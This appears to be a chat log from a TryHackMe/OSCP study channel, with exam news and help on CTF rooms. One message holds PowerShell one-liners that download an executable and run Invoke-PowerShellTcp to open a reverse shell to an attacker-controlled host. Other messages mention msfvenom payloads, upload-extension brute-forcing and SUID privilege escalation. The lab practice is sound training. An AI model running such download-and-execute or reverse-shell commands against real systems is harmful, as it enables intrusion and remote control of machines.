I'm definitely going to subscribe soon as i have time in the next few weeks. I've been reading up a lot about the changes to pwk and there's a lot of new and cool stuff in it. I think we'll need a few new rooms but from whatI hear most of the previous stuff can still get you a viable pass, however a lot of fun new opportunities have just opened up and i think a lot of people will get a kick out of the new tactics

We are happy to inform you that you have successfully completed the Penetration Testing with Kali Linux certification exam and have obtained your Offensive Security Certified Professional (OSCP) certification.
Finally 😅

gz 🎊

@real sandal Congrats !! You pass the New version ?

I mean

Technically the exam is the same iirc

If we already have the cert/course did they update our content?

Yeah exam hasn’t changed

You have to pay to get new content whether you’re a student or passed

Exam is the same, just additional content.

Yeah but the course changed, that what i would Say sry

That sucks, like the AWAE, they said they will update and give free exam for those who take it on conf but they didnt

on conf?

Yeah at Defcon etc

Sry my autocorrection sucks

Does the OsCp path comes with a badge or something to show off on a resume 🥴🥴🥴

??

@fleet wedge Completing the path won't really get you anyway, it's meant as preparation for the actual exam, have a look at: https://cybersecurity.att.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp

Anyone here have the new course material?

the updated PDF?

@dense gale very few people going to spend a small fortune on that cert or the updated docs and risk their certifications and careers for that. All the pdfs and vids are watermarked with the individual's info.

just wanted to know how different it was compared to old stuff

i have oscp pdf and its like 360+ pages and wondered if new one has loads more init

one of the guys i work with is doing it soon and he wondered

It's taking 5 days now for people to get the course material so don't think anyone has received the new stuff yet

oh right they still doing the whole "start days are sundays" etc

I think it's more that they're swamped now. It was supposed to only take 3 days but I know people that ordered the upgrade on Tuesday and then OS replies "Ok wait 4-5 days for the materials"

A friend of mine paid for the upgrade. It's 850 pages. Content is similar, more beginner friendly approach (they want to encourage more people to jump in sooner) videos/workbook have both had a visual makeover. Lots of stuff on Windows, good if you're unfamiliar.

That's good. Yeah given the length people were afraid it would take them longer to get into the labs now, but as long as they encourage them to start playing with it while following along in the PDF

ahhhh thats huge!

im glad they're encouraging people new to pentetsing in to it, i reckon they've done it to stop people diverting off to courses like elearnsecurity

anyone done any of the Elearnsecurity stuff?

@maiden aurora okay thanks

Seen the link before tho.

You can see from the official syllabus they push lots of beginner Linux stuff and all that, stuff you should probably have already covered through kali.training or other resources before they dump you into the fun stuff.

Anyone to assist with kenobi mount command...?

@trim vapor sure, DM me

Can someone help me on the HackPark box. I at the Hydra part and I'm pretty sure what I have is correct, However I am getting multiple results back. I taken a look at the write up and tried to compare what I have which looks identical.

if u r brute forcing http it can be a good idea to push the packets through a proxy such as BURP

that way you can inspect the request and response

If anybody is looking at working on hackpark together let me know, I am hitting a wall on the hydra command

FYI it seems OffSec added a new rule that you can't use screen recorders (like OBS) during the exam https://www.offensive-security.com/faq/#screen-recording

Does anyone knows about nagios unauthenticated rce?

Did anyone else had a problem on Alfred with the last step of switching shells ? Having a problem executing my exe payload and not sure why.

sorry i didn't get the blogs posted

had irl stuff to deal with

will try get them out this week

@frail vine whats your blog link? looking to add some more blogs to my rss 🙂

nvm think i found it

@strong jetty did you figure out Alfred? I had issues as well originally

@grim pendant https://www.pwndefend.com

@strong jetty my blog goes into this i think

No could not get the last bit working. Thanks UK_daniel_card I had look at you blog and may just follow your steps. As far as I can tell everything I am doing is correct don't get any errors from the console so not sure.

@rustic walrus we dont have have nagios. do we?

OffSec posted a new FAQ for PWK/OSCP :)

https://www.offensive-security.com/offsec/pwk-oscp-faq/

its official I have pressed the super panic button. exam on 28th

Has anyone done HackPark the intended way ? The write up uses another method but Im trying the intended way and its not working as expected.

@burnt walrus we have nagios login panel, I was looking for some exploit, so found that there's an rce. But it was updated one and later I got to know that it was a rabbit hole 😂

Lol

We all fall in to rabbit holes

Should write a guide. Rabbit holes survival for 24 hours

anyone around have a question

just ask the question

I have tried this method in hackpark. but doesn't work. tried running as Administrator giving password still didnt work. thnx for the help

https://www.exploit-db.com/exploits/45072

Hello all! I see that the brainpan room has been made private. I already rooted it on my private labs but is that normal ?

Anyone did vulnversity?

i m doind first burpsuit module but there s a difference on what I d see and what I really see on my burp

so I can t complete the module

someone can help me?

has anyone done hackpark the proper way?

@burnt walrus - This is the method I was trying but I could not get it working.

Yea I haven't seen anyone who has done it

So no one has actually done it that way I guess

Feels like I wasted so much time

I dont' think so but that's is the intended way as far as I am aware.

Yea well couldn't get in.

Hey hi @burnt walrus

yo

why when I use manual proxy I m not able to access any website?

What kind of proxy @fathom rapids?

@chrome valve I followed the guide, so I set manual proxy with ip 127.0.0.1 (loopback) and port 8080. after this the proxy refuses the connection. so I can t complete the task.

This will be a burp proxy then? For Burpsuite?

yes

Ok, is Burpsuite open?

yes

ooops, the proxy refuses connections cause burp is intercepting it?

Kinda. If Burpsuite is open and your intercept is on then you won't be able to access any websites without manually forwarding the requests through Burp

If Burpsuite is closed and your proxy is on then it just won't work at all

oook I got it, thank you so much. oh, last question. when I try to navigate to DVWA site as the task requires, burp intercepts and shows security=impossibile, when into the task is shown security=low

do you know why or can I just go on?

Hmm, can you show a screenshot?

sure, thank you so much

@fathom rapids apologies -- got sucked into a piece of pseudocode 😓

You should be able to just ignore that 😄

Let us know if it causes any problems though

so no one really did hackpark intended way?

can anyone DM me about why the hackpark intended way isn't working?

and how they did it?

@hasty sentinel if you find out let us know about it too

I'll test it today/Tomorrow and confirm to you all if it works :)

alright best of luck i tested it and didnt work

@chrome valve intruder attack doesnt work .-.

sniper*

Hmm. What are you trying to do with it?

sorry for the stupid question, sniper attacks has to test every single word in wordlist or it should stop when it finds the right one?ù

Hmm. Good question actually. My instinct says that it will keep trying, but don't quote me on that.
I'll do some tests later

i m testing just now, I thought it had to stop, i m letting try all words now. I ll tell you after finish. thanks

btw, the right one is "password" and it is going on. so the things are 2: or my attack is not working or it has to test all

the workaround for hackpark doesnt even work for me

bruteforce works

what?

im talking about the cve privesc

yea sorry that doesnt work

maybe the one who made that box is the only one who did that the intended way

yea the only problem i have when i do it the intended way is that the service isnt getting called again like its supposed to

yea same here

damn

guess its just messed up

someone need to fix that box or just give a straight guide how it is done

yep

even the next box is like that

steel mountain

anyone who did the intended way

cause the root shell is dying

i havent done that one yet

im doing that one

sorry what is the score rule?ù

dont wanna think about it

@burnt walrus sure i was just curious. i have so few time to think about it

can someone gives me some hint for snipeR?

I test the php extension list and all have response 200, so all should be ok. and i can assume that all extensions are admitted right?

@fathom rapids change the payload to include the "." (example: .php), check the Status and Length response

@hasty sentinel got it?

sorry for the delay - been on a bunch of flights

will get back to you later today :))

ok

what issues are you all getting with HackPark

I managed to get it working the intended way

weird the last part

WScheduler.exe

actually wait lool

ok

@burnt walrus seen the issue :))

we'll look into getting it resolved

oh and also blue steel

even that one Im facing issues

in the priv part

sorry steel mountain

thnx

@robust loom yeah I tried yet, all status responses are 200, so they would be right. lenght 737. I can t understand where i m doing wrong. stuck on that for 1 entire day

can you help me?

here there s a screenshot

don't got the notes right here but recognize it as I hade the same issue

let me check it out

thanks so much

btw I removed the "." before extension cause with the dot I see this request:
Content-Disposition: form-data; name="file"; filename="shell%2ephp"

in any case it gives me response 200 .-.

and you "tagged" the ".ext"?

which box is this?

the name

found the box

@fathom rapids uncheck the Payload Encoding option in the Payloads tab

oh thanks, unchecking the encoding option it appears in the right way. btw all extensions give me response 200,

so I m missing something probably

did you receive other responses?

Check the Length value, but yeah the status code is the same for all

length is the same for all, but if the status code is the same for all how can I know which extension is allowed and which not?

verify your payload marker and payload list

ok analyzing all headers I see the only that has content-length different is .phtml. so I guess it s the right one. btw if we have a long payload list this process could be very time-wasting

only if you don't have pro version

and in oscp exam we can t use pro version

the community edition is limited by throttling the speed

true, so my guessing is that you would not need a lengthy list

btw @robust loom thank you and sorry if I waste your time today

np mate, glad to be of service 😉

we are all here to learn

thank you again 🙂

can somebody help me with HackPark?

I can't get reverse shell if I wanted to

ps1 download, exe download, exe over samba...

I mean upgrading from standard netcat one to metasploit

@robust loom sorry man i m stuck again on the same box on priv esc

@wraith echo try to take advantage of msfvenom to create a reverse shell executable

hey dark

@robust loom all of those above are msfvenom ones

I even tried unicorn to generate one

payload downloads/executes, just reverse connection does not come back

you can use ps to download files

@robust loom i did it...

I used:

IEX DownloadString

or just invoke a reverse shell

Invoke Web Request

samva \

samba*

powershell "(New-Object System.Net.Webclient).Downloadfile('http://your-ip:your-port/rshell.exe','rshell.exe')"

• Reverse shell (on your machine)
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port```

from a shell that is

I even tried to replicate writeup, no result

I will try your way

use msfvenom to create am reverse shell executable and then trigger that

@robust loom please read carefully what i wrote

you need to find the correct payload

I did that

I have used msfvenom

which payload?

I even have correct payload, because I tried to replicate writeup (after 6 own tries)

hum?

so instead of using a netcat listener, you could use metasploit (yeah I know we want not to be dependent on it) to catch the reverse shell call and then migrate to meterpreter from there

sometimes boxes gets f-up due to multiple people may pwn them

I restarted it X times, I don't think its that

dm me and I'll try to step you through it

or hint if that is what you want

any hint on priv esc ofr vulnuniversity?

@fathom rapids enumerate enumerate enumerate 😉

i want to follow his path, so i want to escalate by /bin/systemctl

find the processes that sticks out and learn how to use the command

@fathom rapids https://gtfobins.github.io

gtfobins is a gem 🙂

Have you seen the terminal app for it @robust loom?
Best thing ever invented 😁

yeah saw it for not so long time, just not tested it yet

Fully recommend

but bookmarked it as fast I could 😛

I guess it makes some noise if you want to be as quiet as possible?

It literally just searches the gtfobins database. Shouldn't matter how noisy you are.
Unless we're on about different apps here 😄

this gtfobins is useful for priv esc in my case?

na just if it makes a lot of traffic and you can't afford to be "caught", some CTFs are that way

Honestly, I would imagine that it's probably less noisy than just searching the website for the exploit in your browser

Yes, @fathom rapids

@fathom rapids find any suid/sudo binaries and check it out

i found them yet, but after that I don t know hot to proceed

I don t want the soluction to be clear

if you're on windows then LOLBAS is the alternative

@chrome valve nice

@fathom rapids search for the binary at gtfobins site and try out the suggestion(s)

you'll learn more from that then anyone tell you how to do it, promise

i ll check it, thank you so much again

you learn by try, fail, try-again (x times) and succeed

Just for the record as well, I have it on good authority that the privesc on this box is purposefully chosen because it's sketchy. It was the creator's way of testing to see if beginners had the determination to not give up and just keep trying slightly different things until something works.
In other words: don't give up, you'll get it eventually!

the important part after each box is to reflect, what, why and outcome...and can it be used again... build up your methodology and replay

^^ and write everything down, then condense notes later. Eventually you'll have a massive notebook full of useful information

yeah always note down what you see/find even if you don't think it matter, you can always cleanup later 🙂

one thing I've learned is, time manage your rabbit holes, of you don't find anything after like 30min then go through your notes, enum some more and try again

the only thing I'm having difficult in is the overthinking, the magic is KISS (keep it simple stupid)

...
anyone know how to change the ip after sqlmap has finished so I don't have to re-run after a "box" has changed ip?

flag2

@wraith echo there is a problem in that box. they are checking it

for those who've had issues with HackPark, the public exploit wasn't supposed to work
the room was created so users utilise a variant of the public exploit (if that makes sense)
i've added a hint + extra question on the privesc section to make this clear

let me know if anyone has more issues 🙂

hi all, i'm in Alfred room, but i can't find root.txt find in folder "C:\Windows\System32\config". anyone please help me with this. thanks

@queen bridge try searching for it dir /s *term*

some hint on escalation of vulnuniversity

Were you not working on that yesterday @fathom rapids ?

yeah but was night in italy and after one hour i stopped. i m working on it again from 3 hours now

Ah, fair enough 😄
Just in case I was mixing people up

DM me with what you've tried so far? I'll give you a nudge in the right direction

going crazy on priv esc of vulnuniversity

@fathom rapids DM if you need any help

Did anybody have trouble with getting the proper OS version on vulnversity? I'm sitting here scratching my head, I dont usually have this problem 😂

Nevermind, I'm tired...I forgot to run EVERY type of scan and finally found the one that gave a more concise answer lol

If u want to get the version u can just run 'systeminfo' command

@chrome valve whats the name of this cli gtfobins program? Can u give a github link I couldnt find it xd

There you go @dire jolt:
https://github.com/mzfr/gtfo

ty 😄

so been struggling to get initial sh on Daily Bungle, and when I finally got it the rest was too quick 😬

now the pain starts, BOF

Anyone done Brainstorm?, have a question regarding #2.

I'm trying to do the last part of vulnversity and cant get the privesc to work properly. When I go to enable to $TF it says the job failed because the control process exited with an error code. But then when I try to look at the details of the error, it wont let me because I dont have the correct permissions. Can anybody help me out with this?

@grave patio DM me the exact code you used -- I'll give you a hand with it.

hey guys, would like to ask how is the OSCP path, is it good? thinking about subscription

@mystic forge, in general or on THM?

general

@maiden aurora

i mean TryHackMe* sorry 😛

i know oscp is kinda hard but im already having some experience, just looking for something before HTB oscp-likes boxes

and some people on reddit recommended tryhackme and this specific path

just wondering if its good, and worth to pay $$ for sub

Definitely worth the money if you are looking to get your OSCP cert

Definitely worth paying for the sub @mystic forge. The quality of boxes on TryHackMe tends to be really good, and the OSCP path is very popular. If you don't like it then it's less than a tenner for the month, and you would otherwise be spending a lot more.

Worth the shot at the very least

perfect, will order

do you know if I can add my debit card details, pucharse the 3 month sub and then delete my card details? I know its safe but I'm trying to avoid at any cost providiny my card details anywhere

If you are looking to get a 3 month sub, you could use PayPal

perfect

will order and start learning right away

thanks guys!

Vv welcome 🙂

Is that you just started Cherryblossom by the way @maiden aurora?

Yeah, why?

Have fun 😁
I'm looking for ten roots before I release the write-ups. Do us a favour and give us another one.

It's a lot of fun so far Muirland

Also, I've been considering adding more hints in, so any feedback there is much appreciated 🙂

That's great to hear @hidden rivet!

@chrome valve Mind if I DM you a quick question regarding cherryblossom?

Sure - go for it 😄

@chrome valve do you remember where flag2.txt is in Blue? I searched everywhere and just caught 1 and 3

See if you can find where Windows stores its SAM database @fathom rapids
The flag should be there

@chrome valve thank you, btw how did you know that?

A) because I've done the box before, B) because it's in the hint to the question 🙂

@fathom rapids use the dir command to search for files

I found It After the suggest, btw i was sure i ve searched in config directory yet

next time 😉 dir /s *term*

I'm so struggling with bof, are there now guides for bof on the site?

@robust loom if you have VIP i threw together a guided windows box w/ vulnserver on it

not sure what the room code is, but its called;
Intro to Windows BoF

@mystic forge I'm doing the PwK right now and the oscp track on tryhackme is very nice when I want to take a break from it. They put the rooms together to break up the monatony of the amount of shit you have to learn in the PwK and its nicely guided. The oscp labs are completely open, no help.

U talked me into it bro

g'morning

@crimson flame thx mate, was on OSCP path, but had to break an started "Buffer Overflows"

@rigid gyro welcome mate

o7 😉

https://tenor.com/view/hack-the-planet-hack-scream-yell-shout-gif-4926397

@crimson flame by vip you mean subscription, right?

Best way to upload a meterpreter shell payload once you already have a shell on a victim machine?

I'm starting to 2nd guess my thought process because I'm so tired, but just curious how people do this. Pretty sure there a few different ways

@grave patio wget/curl?

or try to migrate

@robust loom it's a windows server 2012 machine. So I guess I can use powershell to download wget from my attack machine and then use that to download my meterpreter payload but I was wondering if I'm overthinking it and maybe there is an easier way.

yeah PS on windows. try the simple methods first if it's blocking outbound connection

if it's not

but instead of netcat listener your could use a metasploit listener instead

@robust loom yeah. I think the easiest way would be to just setup a meterpreter listener and run the exploit again, but I was using this as a learning moment to make sure I knew how to transfer a file (new meterpreter shell) and run it from the victim machine. I'm gonna try the PS route and see if that works.

Sounds convoluted when I reread what I just said, but I think I'm making sense 😂

that's the way to think :), try, fail, retry - LEARN

@grave patio no need to download to download 😉 just download the payload using PSSo I guess I can use powershell to download wget from my attack machine and then use that to download my meterpreter payload

@robust loom omg...derp. I took a break, ate some food. Now I'm feeling more awake, back to it haha thanks for adding that

@crimson flame sorry, but can't find the room, is it removed?

found the banner through google

ask Skidy

Hi there, let me have a look

https://tryhackme.com/room/windowsbof

The room should be open?

On the vulnversity room, when attempting the Intruder attack, shouldn't the sample wordlist drop the dot "." from the extension names? I couldn't get that attack to work until I did....if this has been brought up already then never mind 🙂

would that not depend on if you selected the dot in the first place?

i didnt so i dont really know

oh I see what you mean now

I think that's what I did when selecting the extension..makes sense